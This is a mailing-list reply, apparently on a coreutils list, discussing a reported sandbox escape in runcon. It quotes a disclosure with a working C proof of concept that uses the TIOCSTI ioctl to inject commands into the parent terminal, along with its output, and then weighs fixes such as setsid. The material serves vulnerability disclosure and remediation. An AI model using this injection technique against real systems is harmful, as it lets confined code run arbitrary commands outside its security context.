On 25/09/16 12:39, [email protected] wrote: > When executing a program via the runcon utility, the nonpriv session > can escape to the parent session by using the TIOCSTI ioctl to push > characters into the terminal's input buffer, allowing an attacker to > execute arbitrary commands without the SELinux security context. > > $ cat test.c > #include <unistd.h> > #include <sys/ioctl.h> > > int main() > { > char *cmd = "id\n"; > while(*cmd) > ioctl(0, TIOCSTI, cmd++); > execlp("/bin/id", "id", NULL); > } > $ gcc test.c -o test > $ runcon -t sandbox_t ./test > id > uid=1000 gid=1000 groups=1000 > context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023 > $ id <--- did not type this > uid=1000(saken) gid=1000(saken) groups=1000(saken) > context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 > > This issue has been recently patched in the SELinux sandbox (CVE-2016-7545): > https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
There are side effects to that though like not being able to background tasks etc.? There collection of links on the issue at https://bugs.debian.org/816320 If setsid was an option, one could use `runcon ... setsid the_command` though that would be less secure operation by default. The same issue impacts chroot(1) somewhat also. I'm not sure of the best fix here. Pádraig
